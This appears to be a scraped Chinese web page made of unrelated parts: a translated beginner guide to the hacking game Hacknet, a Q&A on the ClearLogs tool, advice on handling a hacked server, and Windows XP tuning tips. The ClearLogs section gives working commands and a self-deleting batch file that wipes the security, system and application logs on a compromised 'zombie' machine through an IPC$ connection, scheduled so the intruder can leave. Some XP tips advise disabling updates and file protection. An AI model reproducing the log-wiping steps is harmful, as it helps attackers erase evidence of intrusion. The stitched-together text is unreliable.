黑客ClearLogs(黑客软件)

hacker|
83

黑客网络新手指南翻译大全 黑客网络Hacknet新手怎么玩

黑客网络Hacknet你会玩了吗?小伙伴们是不是正在为看不懂英文而烦恼呢,不要烦恼,今日小编为大家带来最全的新手指南,全中文翻译哦,感兴趣的玩家赶紧来看看吧!

Basic Tips 基础窍门

***IMPORTANT*** Some computers/servers may have different names on them, but what you need to do should be the same. Just follow the steps, you will be fine.

***非常重要*** 有些电脑/服务器可能有不同的名字,但你所要做的应该相同。遵循如下步骤,您就不会有问题。

DON'T abandon any missions atm!! It will most likey cause serious problems and make you unable to finish the game!

眼下,***请勿***放弃任何任务!!这很可能导致严重问题并最终无法完成游戏,毁掉您的存档!

1, Type commands as soon as possible.

2, Delete logs when you disconnect.

3, You need to reply almost every time you finish a mission.

4, Always use "Scan Network" option when you successfully hack a computer.

5, Don't delete/rename files unnecessarily. -This is important!!

6, Use auto-complete for commands and file names. (Tab key)

7, Always use "admin" "alpine" to log in to any eos devices.

1.尽速输入指令。(译者:更要善用Tab)

2.断线前别忘了删log。(译者:虽然我不删也没有什么麻烦……)

3.不要忘了完成任务时回复邮件。(极少数情况不需要)

4.成功骇入电脑时总扫描一遍主机。(译者:★★★★★推荐)

5.无必要时不要删除/重命名任何文件!—十分重要。

6.使用“自动拼写”(Tab键)输入指令及文件名。

7.不要忘了“admin”“alpine”这神奇的eos设备账户。

译者:即使你希望独立完成游戏,我也非常推荐您阅读这些提示,它们非常有用。另外我在此补充几条。

(但愿我没记错……)

1.SQL的入侵工具和KBT,即104端口入侵工具可以忽视Proxy和Firewall。

2.Firewall和Proxy的破解是独立的,你可以一边破解proxy一边analysis。更有甚者,用Tracekill可以允许您慢悠悠地破解完Firewall,再攻破proxy。

3.在shell里按overload破解proxy,对吧?然而如果内存不足,这些窗口会折叠,并在内存足够时展开。(如果我说的不清楚,可以试着在您的电脑上运行一堆shell并点按trap,然后关掉其中一个窗口。)除了略有点壮观以外,这是个“储存”足够多shell的小技巧。

4.不过,5~7个shell一般够了。

5.在几次analyze后弹出的几行文字里应该会各有一个字符,如果某一行里全是”0”怎么办?有时这意味着所对应的代码就是0。例如:(只是示范)

0 0 0 0 0 0 0 0 0 0 2 0 0 0

0 0 0 0 0 5 0 0 0 0 0 0 0 0

0 0 0 0 0 0 0 0 0 0 0 0 0 0

结果就是250。(我才不是250呢!)

Troubleshooting Common Problems

Q, I don't get an email to start a new mission!! What do I do now!?

A, Make sure to check following things:

1, Your previous mission has finished. (Click "Reply" in the email for it and see if "Mission Incomplete" message shows up.)

2, You don't have any available missions in your current faction's contracts server. (Or the message board if you're working on /el missions.)

3, Restart your game and your problem is still there.

常见问题解决方案。(疑难杂症)

Q:我得不到开始新任务的邮件!!我该怎么办!

A:出门检查您的邮筒(划掉)。请确认您已检查过以下条件。

1.你上一个的任务已完成。[尝试点按邮件中的“Reply”(回复)看会不会出现“Mission incomplete”(任务未完成)。]

2.在您现在所处的派系(Entropy,CSEC,…)没有可用的任务,或者

在/el任务里信息板上没有任务。

3.重启游戏问题仍存在。

For "gg wp" from Naix, you need to revenge Naix BEFORE you start any new Entropy mission. Details in "Naix Missions" section below.

对于Naix的“友善问好”,你要在完成Entropy任务***之前***对Naix报仇。下面的“Naix任务”一栏会给您帮助。

If none of these helps you, you might have had a critical bug... The devs are working on an update to fix many bugs, so wait for it... Meanwhile, you still can try 2 options:

1, Editing your save data (Here's the link: http:// Be super careful with your savedata.)

2, Start a new session (This is much easier... You also can work on achievements that you missed.)

若以上几条都不起作用,您已无药可救了(划掉)。您可能遇到了一个严重的bug(您不会连bug也不知道吧?)。开发者们(们?)在致力于更新游戏以修正bug。所以只能等了。

在此时,您可以尝试以下方法。

1.编辑您的存档。(敬参阅{链接已删除}请特别小心对待您的存档)

2.再开个存档。(不仅简单多了,还可以去做您以前忽略的成就。)

Q, I don't have the necessary exe file to do this mission!! UGGHHHH

A, Here is the list of exe files, and in which mission you can find them. Use "CTRL+F" on this guide and search for them.

Q.我怎么没有做任务所需的工具!!啊啊啊!!

A.这是exe文件列表及其来源,用"CTRL+F"在这指南里搜索一下。

SecurityTracer.exe - "First Contact", or on "Credit Server" after you finish the game.

SSHcrack.exe (for port 22) - "Getting Some tools together"

FTPBounce.exe (for port 21) - "Welcome"

eosDeviceScan.exe (for finding eos device) - "eOS Device Scanning"

SMTPoverflow.exe (for port 25) - "Aggression must be punished"

WebServerWorm.exe (for port 80) - "***Revenging Naix***", or "CSEC Invitation"

SQLBufferOverflow.exe (for port 1433) - "-Shrine of Polar Star-"

SQL_MemCorrupt.exe (for port 1433) - "CSEC Invitation - Congratulations"

Decypher.exe (for decrypting files) - "Ghosting the Vault"

DECHead.exe (for analyzing .dec files) - "Through the Spyglass"

KBT_PortTest.exe (for port 104) - "Project Junebug"

TraceKill.exe (for freezing traces) - "Bit -- Foundation"

Sequencer.exe (for the final hacking) - "Bit -- Termination"

Clock.exe (Um...just a clock app) - Read "-Finding Clock.exe-"

SecurityTracer.exe(安全追踪程序) -来自 "First Contact"(第一次沟通), 或在完成游戏时的"Credit Server" (荣誉服务器)上。

SSHcrack.exe (ssh协议破解器)(适用端口 22) - "Getting Some tools together"(收集些工具)

FTPBounce.exe (ftp“跳转攻击”破解器)(适用端口21) - "Welcome"(欢迎)

eosDeviceScan.exe(eos设备搜寻器) (适用寻找eos设备) - "eOS Device Scanning"(搜寻eos设备)

SMTPoverflow.exe(邮件过载破解器) (适用端口25) - "Aggression must be punished"(侵略者必将受惩处)

WebServerWorm.exe (网络蠕虫破解器)(适用端口80) - "***Revenging Naix***"(向Naix复仇 译者:这不是一个官方给出的任务名,我没记错的话。), or "CSEC Invitation"(CSEC诚邀您到来)

SQLBufferOverflow.exe (SQL内存缓冲区过载破解器)(适用端口1433) - "-Shrine of Polar Star-"(北极星圣地)

SQL_MemCorrupt.exe(SQL_内存错误破解器) (for port 1433) - "CSEC Invitation - Congratulations"(CSEC邀请-祝贺!)

(译者:根据另一个指南,这两个SQL破解器完全一样。)

Decypher.exe (解密器)(适用解密文件) - "Ghosting the Vault"[拱顶鬼神(?)]

DECHead.exe (十六进制文件头查看器/加密文件查看器?)(适用分析加密文件) - "Through the Spyglass"(通过望远镜)

KBT_PortTest.exe[KBT端口测试器(其实也是破解器。)] (适用端口104) - "Project Junebug"(Junebug项目)

TraceKill.exe(阻止追踪) (适用冻结追踪) - "Bit -- Foundation"(Bit-支柱)

Sequencer.exe(排序器) (适用最后骇入) - "Bit -- Termination"(Bit-终局)

Clock.exe (钟)(Hmm…只是个钟的软件) - Read "-Finding Clock.exe-"(敬参阅“寻找‘Clock.exe’”)

For KBT_PortTest.exe, you can try this method if you don't get "Project Junebug" unlocked, or mistakenly abandoned it. Thank you, Elsarild!

对于KBT_PortTest.exe,若您没有解锁“Junebug项目”,或失误取消了这个任务,可以试试这个方法。谢谢您,Elsarild!

http://

Q, I can't use this command somehow!! Fuuuuuuuuuuuuuuu

A, Make sure to check if you already have the necessary exe for the command, then try typing commands like below:

Q,由于某种原因我没法用这命令!(根据相关法律法规和政策,该信息不予公布)

A,确认您已具备所需的软件,然后根据以下范例输入命令。

译者:Hacknet的命令似乎更接近Linux。

Command Template - Example

命令 样板 - 范例

scp [the file's name] - scp index.html

connect [the IP address] - connect 103.33.8.643

cd [the folder path] - cd /log

replace [the file's name] "[target words]" "[your words]" - replace template.txt "[FIRST_NAME]" "John"

(If you use "cat" and open the file, you can use 'replace "[FIRST_NAME]" "John" ' instead. Use the full command above if you get "Assuming active flag file" error.)

Decypher [the file's name] [its password] - Decypher naix_secrets.dec D1CKS

DECHead [the file's name] - DECHead naix_private_photos.dec

mv [target's name] [new name] - mv template.txt Boorman_John[111]

scp (文件传输)[the file's name(文件名)] - scp index.html

connect(连接) [the IP address(IP地址)] - connect 103.33.8.643

cd (改变目录)[the folder path(文件地址)] - cd /log

replace(替换) [the file's name(文件名)] "[target words(文件中目标文字)]" "[your words(你想要替代它的文字)]" - replace template.txt "[FIRST_NAME]" "John"

[若您使用cat打开文件,你可以使用以下命令:“replace "[FIRST_NAME]" "John"”,若得到"Assuming active flag file"(译者:我对这句实在没辙……抱歉……)错误则打全整条命令。]

Decypher [the file's name(文件名)] [its password(其密码,有时没有)] - Decypher naix_secrets.dec D1CKS

mv(移动) [target's name(目标文件名)] [new name(新名)] - mv template.txt Boorman_John[111]

;wfr=spiderfor=pc

黑客清理痕迹问题

下面是我在网上搜到的,不明白怎么具体操作:

使用方法:

Usage: clearlogs [\\computername] -app / -sec / -sys

-app = 应用程序日志

-sec = 安全日志

-sys = 系统日志

a. 可以清除远程计算机的日志

** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名

** 然后开始清除: 方法

clearlogs \\ip -app 这个是清除远程计算机的应用程序日志

clearlogs \\ip -sec 这个是清除远程计算机的安全日志

clearlogs \\ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面

然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志

clearlogs -sec 这个是清除远程计算机的安全日志

clearlogs -sys 这个是清除远程计算机的系统罩?

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.

例如建立一个 c.bat

rem ============================== 开始

@echo off

clearlogs -app

clearlogs -sec

clearlogs -sys

del clearlogs.exe

del c.bat

exit

rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果

第一行表示: 运行时不显示窗口

第二行表示: 清除应用程序日志

第三行表示: 清除安全日志

第四行表示: 清除系统日志

第五行表示: 删除 clearlogs.exe 这个工具

第六行表示: 删除 c.bat 这个批处理文件

第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:\c.bat

服务器被攻击后怎么处理?

1、发现服务器被入侵,应立即关闭所有网站服务,暂停至少3小时。这时候很多站长朋友可能会想,不行呀,网站关闭几个小时,那该损失多大啊,可是你想想,是一个可能被黑客修改的钓鱼网站对客户的损失大,还是一个关闭的网站呢?你可以先把网站暂时跳转到一个单页面,写一些网站维护的的公告。

2、下载服务器日志,并且对服务器进行全盘杀毒扫描。这将花费你将近1-2小时的时间,但是这是必须得做的事情,你必须确认黑客没在服务器上安装后门木马程序,同时分析系统日志,看黑客是通过哪个网站,哪个漏洞入侵到服务器来的。找到并确认攻击源,并将黑客挂马的网址和被篡改的黑页面截图保存下来,还有黑客可能留下的个人IP或者代理IP地址。

3、Windows系统打上最新的补丁,然后就是mysql或者sql数据库补丁,还有php以及IIS,serv-u就更不用说了,经常出漏洞的东西,还有就是有些IDC们使用的虚拟主机管理软件。

4、关闭删除所有可疑的系统帐号,尤其是那些具有高权限的系统账户!重新为所有网站目录配置权限,关闭可执行的目录权限,对图片和非脚本目录做无权限处理。

5、完成以上步骤后,你需要把管理员账户密码,以及数据库管理密码,特别是sql的sa密码,还有mysql的root密码,要知道,这些账户都是具有特殊权限的,黑客可以通过他们得到系统权限!

6、Web服务器一般都是通过网站漏洞入侵的,你需要对网站程序进行检查(配合上面的日志分析),对所有网站可以进行上传、写入shell的地方进行严格的检查和处理。如果不能完全确认攻击者通过哪些攻击方式进行攻击,那就重装系统,彻底清除掉攻击源。

电脑卡问题

我给你个药方,你优化一下也许会好点:

运行: msconfig 在启动里留下 ctfmon.exe 其它的勾都去掉。

按下面说的在控制面板里把一些服务关掉估计开机进程为14~19个

开始--运行--services.msc

必须禁止的服务

1.NetMeeting Remote Desktop Sharing:允许受权的用户通过NetMeeting在网络上互相访问对方。这项服务对大多数个人用户并没有多大用处,况且服务的开启还会带来安全问题,因为上网时该服务会把用户名以明文形式发送到连接它的客户端,黑客的嗅探程序很容易就能探测到这些账户信息。

2.Universal Plug and Play Device Host:此服务是为通用的即插即用设备提供支持。这项服务存在一个安全漏洞,运行此服务的计算机很容易受到攻击。攻击者只要向某个拥有多台Win XP系统的网络发送一个虚假的UDP包,就可能会造成这些Win XP主机对指定的主机进行攻击(DDoS)。另外如果向该系统1900端口发送一个UDP包,令“Location”域的地址指向另一系统的 chargen端口,就有可能使系统陷入一个死循环,消耗掉系统的所有资源(需要安装硬件时需手动开启)。

3.Messenger:俗称信使服务,电脑用户在局域网内可以利用它进行资料交换(传输客户端和服务器之间的Net Send和Alerter服务消息,此服务与Windows Messenger无关。如果服务停止,Alerter消息不会被传输)。这是一个危险而讨厌的服务,Messenger服务基本上是用在企业的网络管理上,但是垃圾邮件和垃圾广告厂商,也经常利用该服务发布弹出式广告,标题为“信使服务”。而且这项服务有漏洞,MSBlast和Slammer病毒就是用它来进行快速传播的。

4.Terminal Services:允许多位用户连接并控制一台机器,并且在远程计算机上显示桌面和应用程序。如果你不使用Win XP的远程控制功能,可以禁止它。

5.Remote Registry:使远程用户能修改此计算机上的注册表设置。注册表可以说是系统的核心内容,一般用户都不建议自行更改,更何况要让别人远程修改,所以这项服务是极其危险的。

6.Fast User Switching Compatibility:在多用户下为需要协助的应用程序提供管理。Windows XP允许在一台电脑上进行多用户之间的快速切换,但是这项功能有个漏洞,当你点击“开始→注销→快速切换”,在传统登录方式下重复输入一个用户名进行登录时,系统会认为是暴力破解,而锁定所有非管理员账户。如果不经常使用,可以禁止该服务。或者在“控制面板→用户账户→更改用户登录或注销方式”中取消“使用快速用户切换”。

7.Telnet:允许远程用户登录到此计算机并运行程序,并支持多种 TCP/IP Telnet客户,包括基于 UNIX 和 Windows 的计算机。又一个危险的服务,如果启动,远程用户就可以登录、访问本地的程序,甚至可以用它来修改你的ADSL Modem等的网络设置。除非你是网络专业人员或电脑不作为服务器使用,否则一定要禁止它。

8.Performance Logs And Alerts:收集本地或远程计算机基于预先配置的日程参数的性能数据,然后将此数据写入日志或触发警报。为了防止被远程计算机搜索数据,坚决禁止它。

9.Remote Desktop Help Session Manager:如果此服务被终止,远程协助将不可用。

10.TCP/IP NetBIOS Helper:NetBIOS在Win 9X下就经常有人用它来进行攻击,对于不需要文件和打印共享的用户,此项也可以禁用。

可以禁止的服务

以上十项服务是对安全威胁较大的服务,普通用户一定要禁用它。另外还有一些普通用户可以按需求禁止的服务:

1.Alerter:通知所选用户和计算机有关系统管理级警报。如果你未连上局域网且不需要管理警报,则可将其禁止。

2.Indexing Service:本地和远程计算机上文件的索引内容和属性,提供文件快速访问。这项服务对个人用户没有多大用处。

3.Application Layer Gateway Service:为Internet连接共享和Internet连接防火墙提供第三方协议插件的支持。如果你没有启用Internet连接共享或Windows XP的内置防火墙,可以禁止该服务。

4.Uninterruptible Power Supply:管理连接到计算机的不间断电源,没有安装UPS的用户可以禁用。

5.Print Spooler:将文件加载到内存中以便稍后打印。如果没装打印机,可以禁用。

6.Smart Card:管理计算机对智能卡的读取访问。基本上用不上,可以禁用。

7.Ssdp Discovery Service:启动家庭网络上的upnp设备自动发现。具有upnp的设备还不多,对于我们来说这个服务是没有用的。

8.Automatic Updates:自动从Windows Update网络更新补丁。利用Windows Update功能进行升级,速度太慢,建议大家通过多线程下载工具下载补丁到本地硬盘后,再进行升级。

9.Clipbook:启用“剪贴板查看器”储存信息并与远程计算机共享。如果不想与远程计算机进行信息共享,就可以禁止。

10.Imapi Cd-burning Com Service:用Imapi管理CD录制,虽然Win XP中内置了此功能,但是我们大多会选择专业刻录软件,另外如果没有安装刻录机的话,也可以禁止该服务。

11.Workstation:创建和维护到远程服务的客户端网络连接。如果服务停止,这些连接都将不可用。

12.Error Reporting Service:服务和应用程序在非标准环境下运行时,允许错误报告。如果你不是专业人员,这个错误报告对你来说根本没用。

再就是如下几种服务对普通用户而言也没有什么作用,大家可以自己决定取舍,如:Routing and Remote Access、Net Logon、Network DDE和Network DDE DSDM

下面是优化的

1.减少进度条滚动时间

方法:注册表:HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSetControl\\Session Manager\\Memory ManagementPrefetchParameters 在右边有一个EnablePrefetcher

项,将默认值"3"改为"1"。

2.加速共享查看

方法:注册表:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\WindowsCurrentVersion\\Explorer\\RemoteComputer\\NameSpace删除下面的{D6277990-4C6A-11CF-8D87-00AA0060F5BF}

然后重新启动计算机。

3.加快关机速度

方法:注册表:HKEY_CURRENT_USER\\Control Panel\\ Desktop,里

将HungAppTimeout 的值改为“5000”再将WaitToKillAppTimeout

改为“4000”。

再将HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control中的WaitToKillServiceTimeout改为“4000”。

另外将“控制面板—管理工具—服务”中的NVidia Driver Help服务

改为手动

按下Ctrl+Alt+Del 在弹出的任务管理器中点击“关机”-“关机”命令

的同时按住Ctrl不放,可以马上关机。

4.压缩文件夹

禁用将压缩文件夹当做文件夹浏览,方法:在运行输入框内输入,

“regsvr32 /u zipfldr.dll”

5.windowsxp的清晰字体

“控制面板--外观和主题--显示”中的“外观”选项卡上“效果”,在“效果”

对话框中选“使用下列方式使屏幕字体的边缘平滑”复选框,在列表中选“清晰”。

6.windowsXP 的Net Send

net seng 命令使用:“开始--运行”中输入:net send 对方的IP地址 需要输入

内容

AT net seng 命令的使用:“开始--运行”中输入:AT 需要提示的时间 net send

对方的IP地址 需要输入的内容

7.LCD中的Cleartype字体

在LCD显示器中显示Cleartype字体的方法:注册表:HKEY_USERS\\.DEFAULTControl panel\\Desktop 中的 “FontSmoothingType” 将数值改为“2”,

再重新启动计算机。

8.定制特殊的启动提示

注册表:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\Winlogon

中的"LegaNoticeCaption"是登陆提示语言,“LegalNoticeText”是欢迎词。

9.IE浏览器加速

右键点击IE的快捷方式,在“目标”栏里复制以下文字:

"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" -nohome

10.菜单延迟

注册表:HKEY_CURRENT_USER\\ControlPanel\\Desktop中的MenuShowDelay的键值改为“0”

11.GPEDIT和Autoplay

windowsXP自带的优化文件:gpedit.msc

使用:在“运行”中输入“gpedit.msc”这是一个非常有效的编辑工具,可以修改一些

常用的设置

12.关闭windows的文件保护

默认状态下是无法删除windows系统和程序文件的,所以警告!!!!!!!!!!!!!!!!

注册表:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\Curren tVersion \\w

inlogon 中的“SFCDisable”将它的值改为“ffffff9d”

13.关闭计算机时自动结束任务

注册表:HKEY_CURRENT_USER\\Control Panel\\Desktop 中的“AugoEndTasks”的键值改为“1”

14.windowsXP的内存优化!!!!!!!!!!!!(警告!!!!!以下设置需要有256M以上的内存才能有好的效果!!!)

注册表:

HKEK_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SessionManager\\Memory Management

中的:禁用内存页面调度: DisablePagingExecutive 值改为“1”

提升系统缓存: LargeSystemCache 值改为“1”

15.专业版和家用版通用优化技巧

a.)“我的电脑”—“属性”—“高级”—“启动和故障修复”中,点“错误报告”,选择“禁用

错误汇报”,“但在发生严重错误时通知我”

b.)去掉“将事件写入系统日志”,“发送管理警报”,“自动重新启动”选项,将“写入调试信息”

设置为“无”

c.)点击“编辑”,在记事本文件中:[OperatingSystems]

timeout=30改为timeout=0

multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS="Microsoft Windows XP Professional" /fastdetect

中的fastdetect改为nodetect

在注册表中修改:HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control 中的“SystemStartOptions”

键值改为NODETECT

d.)禁用多余的服务级件

右键“我的电脑”—“管理”—“服务和应用程序”—“服务”中可以将不需要的服务禁用。

可以关闭的服务有:(选择使用!!!!!!)

“Clipbook Server”(文件夹服务器):这个服务允许你们网络上的其他用户看到你的文件夹。

在这里我要强烈建议你把它改为手动启动,然后再使用其他程序在你的网络上发布信息。

“Messenger”(消息):在网络上发送和接收信息。如果你关闭了Alerter,你可以安全地把它

改为手动启动。

“Printer Spooler”(打印后台处理程序):如果你没有配置打印机,建议改为手动启动或干脆

关闭它。

“Fast Usertching Compatibility”(快速用户切换兼容性):建议改为手动启动。

“Automatic Updates”(自动更新):在这里可以改为手动启动。

“Net Logon”(网络注册):处理象注册信息那样的网络安全功能。你可以把它设改为手动启动。

“Network DDE和Network DDE DSDM”(动态数据交换):除非你准备在网上共享你的Office,否则

你应该把它改为手动启动。

“NT LM Security Support”(NT LM安全支持提供商):在网络应用中提供安全保护。建议你把

它改为手动启动。

“Remote Desktop Help Session Manager”(远程桌面帮助会话管理器):建议改为手动启动。

“Remote Registry”(远程注册表):使远程用户能修改此计算机上的注册表设置。建议改为

手动启动。

“Task Scheduler”(任务调度程序):使用户能在此计算机上配置和制定自动任务的日程,它

计划每星期的碎片整理等。 除非你实在太懒了,连在电脑上开一下都不想,建议改为手动启动。

“Uninterruptible Power Supply”(不间断电源):它管理你的UPS。如果你没有的话,把它改

为手动启动或干脆关闭它。

“Windows Image Acquisition (WIA)”(Windows 图像获取 (WIA)):为扫描仪和照相机提供图

像捕获,如果你没有这些设备,建议改为手动启动或干脆关闭它。

e.)关闭Dr.Watson

在“开始”—“运行”中输入“drwtsn32”,调出系统程序,在“选项”中只保留“转储全部线程

上下文”,其他全部取消。

d.)解决任务栏的假死问题(权威的消除QQ,IE等引起的任务栏的假死问题)

“控制面板”—“区域和语言选项”—“语言”—“详细信息”,在弹出的设置框中选择选项的

语言栏,关闭“在桌面上显示语言栏”,在第三项“在通知区域显示其他语言栏图标”复选框上

打上勾,如果不需要手写识别,语音识别的话,也可以将最后一项关闭。

f.)快速锁定计算机

在桌面上单击右键,在快捷菜单上选择“新建”—“快捷方式”,在导向文本框中输入

“rundll32.exe user32.dll,LockWorkStation”单击下一步对快捷方式进行命名,完成。

然后可以对图标进行修改:右键单击快捷方式,选择“属性”—“快捷方式”—“更改图标”

在“在这个文件中查找图标”文本框中输入“Shell32.dll”,单击确定,开始选择自己喜欢的图标。

16.修改cpu的二级缓存

在正常情况下,xp会自动识别cpu的二级缓存。但有时xp不会这样做,这样就需要手动优化以改善cpu的

性能。

a.)运行"regedit";

b.)去"[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session ManagerMemory Management\\SecondLevelDataCache]";

c.)修改他的十进制:

AMD Duron: 64(kb);

CeleronA/celeron2:128;

PII mobile/PIII E(EB)/P4/AMD K6-3/AMD THUNDERBird/Cyrix III:256;

AMD K6-2/PII/PIII katmai/AMD Athlon:512;

PII Xeon/PIII Xeon:1024;

e.)重启。

17.修改磁盘缓存以加速xp

磁盘缓存对xp运行起着至关重要的作用,但是默认的I/O页面文件比较保守。所以,

对于不同的内存,采用不同的磁盘缓存是比较好的做法。

a.)运行 "regedit";

b.)去[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session ManagerMemory Management\\IoPageLockLimit];

c.)根据你的内存修改其十六进制值:

64M: 1000;

128M: 4000;

256M: 10000;

512M或更大: 40000.

d.)重启

18.预读设置以提高速度

xp使用预读设置这一新技术,以提高系统速度。如果你拥有PIII 800, 512M内存以上,

推荐一下修改:

a.)运行“egedit”

b.)去[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session ManagerMemory Management\\PrefetchParameters\\EnablePrefetcher];

c.)设置数值0,1,2,3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读 ("3",推荐使用)。

d.)重启

19.清除预读文件

当xp使用一段时间后,预读文件夹里的文件会变的很大,里面会有死链文件,这会减慢系统时间。

建议,定期删除这些文件。(c:\\windows\\prefetch)

20.减少磁盘扫描等待时间

在dos下,键入“chkntfs/t:0”

0:表示等待时间为0秒

21.关闭“系统还原”功能

具体操作为:右键单击“我的电脑”,点击属性,会弹出来系统属性对话框,点击“系统还原”,

在“在所有驱动器上关闭系统还原”选项上打勾

22.关闭“自动更新”功能

具体操作为:右键单击“我的电脑”,点击属性,点击“自动更新”,在“通知设置”一栏选择

“关闭自动更新。我将手动更新计算机”一项。

23.寻找“添加/删除”菜单中隐藏了的选项

不喜欢MSN Messenger吗,或是想把Windows Media Player媒体播放器给删掉?可惜打开控制面板中

的“添加/删除程序”,Windows XP自带的程序都不在里面。其实很容易找到,只需用记事本打开

Windows\\inf\\sysoc.inf文件,找到类似下面这一段:

[Components]

NtComponents=ntoc.dll,NtOcSetupProc,,4

WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7

Display=desk.cpl,DisplayOcSetupProc,,7

Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7

NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7

iis=iis.dll,OcEntry,iis.inf,,7

com=comsetup.dll,OcEntry,comnt5.inf,hide,7

dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7

IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7

TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2

msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6

ims=imsinsnt.dll,OcEntry,ims.inf,,7

fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7

AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7

IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

这是当前所有已安装部件列表,继续前面MSN Messenger的例子,这个程序条目名是“msmsgs”,

在倒数第三行。可以看到“hide”字样,就是这个参数在控制Windows

“添加/删除程序”中不显示这一项。只需把“hide”删掉就得了,如下:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

改为:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

现在重新启动计算机,就可以在“添加/删除程序”列表里看到MSN Messenger了。

如果想要在添加/删除程序里看到所有的已安装组件,只需用记事本打开sysoc.inf文件,

用记事本的查找/替换功能把所有“,hide”替换为“,”就行了

24.解除带宽限制

运行----gpedit.msc-----管理模版-----网络----QoS数据包调度程序---限制可保留带宽---启

动-----下面输入 0 ----确定---------在你的拨号图标右健属性找到网络-----看看有没有QoS

数据包调度程序-------如果没有点安装-----服务------添加----选QoS数据包调度程序----看

看有没有打勾----有就代表成功了--------重启---ok!

XP系统无损害系统手动优化

1.关闭华生医生:

要这个医生干吗?又不会帮你治病,只能告诉你哪里哪里出问题啦,还要在你程序出错的,拼命的读写硬盘,把错误记录下来。至于记录那些英文我是看不懂得,你看的懂吗?你看懂又能怎么样?

方法:单击“开始/运行”,输入“drwtsn32”命令,或者“开始/所有程序/附件/系统工具/系统信息/工具/Dr Watson”,调出系统里的华生医生Dr.Watson ,把里面的选项打勾得都去掉。OK!

2.清除预读文件

当Windows XP使用一段时间后,安装目录下的预读文件夹(C:/Windows/prefetch)里的文件会变的很大,里面会有死链接文件,这会减慢系统时间,建议你定期删除这些文件。

3.关闭媒体预览:

点击AVI的时候发现左边的小图片没,是不是你的A片的开头图像,不要被别人发现拉还是关掉吧,把A片也改个名字呵呵。开始|运行中输入并执行“REGSVR32 /U SHMEDIA.DLL”,取预览。

4.取消ZIP文档读取能力:

那么多压缩软件,我还要你这个微软的干吗?而且还消耗系统资源,除非BILL整合支持各种各样的压缩格式,那样就好啦,哈哈。“开始”选单的“运行”中输入“regsvr32 /u zipfldr.dll”即可

5.启动故障调试关闭:

跟华生医生差不多的,都不是个好医生,呵呵.

进入系统属性(我的电脑上点击右键,属性),高级里面的启动故障恢复,设置

把“写入调试信息”改称“无”,把打勾得都去掉。OK

6.关闭不需要的效果:

进入系统属性(我的电脑上点击右键,属性),高级里面的,性能--设置,

保留*窗口按钮显示视觉样式*文件夹显示常用任务*为桌面图标标签使用阴影

确定之后,看看有没有什么变化。呵呵,是不是发现打开什么都快些拉。

桌面上右键属性,打开显示属性,选择外观选项,点击效果,把打勾得都去掉吧。

确定看看,是不是又快些拉。(液晶显示器建议保留CLEARTYPE)

7.关闭系统还原

这个真没用,用这么多年电脑,重来没有还原成功过。

进入系统属性(我的电脑上点击右键,属性),系统还原,关闭所有系统还原。OK

8.启动优化:

有很多是必须禁止启动,应为真的没什么用。

开始运行,输入MSCONFIG,启动选项里面,IMJPMIG,IMSCMIG,TINTSETP把勾去掉吧。如果你是N卡显卡,还可以去掉NVCPL,NWIZ,NVMCTRAY(A卡沃不知道啊)

当然还有很多,每个人机子不一样,不好评说。但是有一点,就算吧里面都去掉,也没关系的,只不过输入法图标没有,然后就是你自己后来安装的一些随机启动的软件不会随机启动拉,但你的系统绝对不会 崩ooo

说句实话,网上流行说法要把什么驱动备份,什么多余语言,什么帮助等等想尽办法删除掉,真不知道这些有什么意义,节约那么1点多G的硬盘空间有什么意义,又不能增强系统效能,反而搞得真需要驱动或者帮助时还不知道该怎么办。

我个人认为只需要删除一些不需要的组件就够啦,比如系统自带的游戏,辅助键盘,通讯录,OUTLOOK,那些我们不用的东西,画图等等。当然这就看各人的需求拉。

在“开始”/“运行”中输入“notepad %systemroot%\inf\sysoc.inf”用记事本打开sysoc.inf这个文件。

按“Ctrl+H”打开“替换”对话框。在“查找”框中输入“hide”,“替换为”不写,然后单击“全部替换”,然后保存退出。(不明白什么意思吗?就是显示所有Windows组件)

接着,打开“控制面板”/“添加删除程序”中的“添加/删除Windows组件”,只需要取消要删除组件前面的勾,然后单击几次“下一步”即可

希望对你有帮助。

怎样删除XP系统中的所有日志文件???

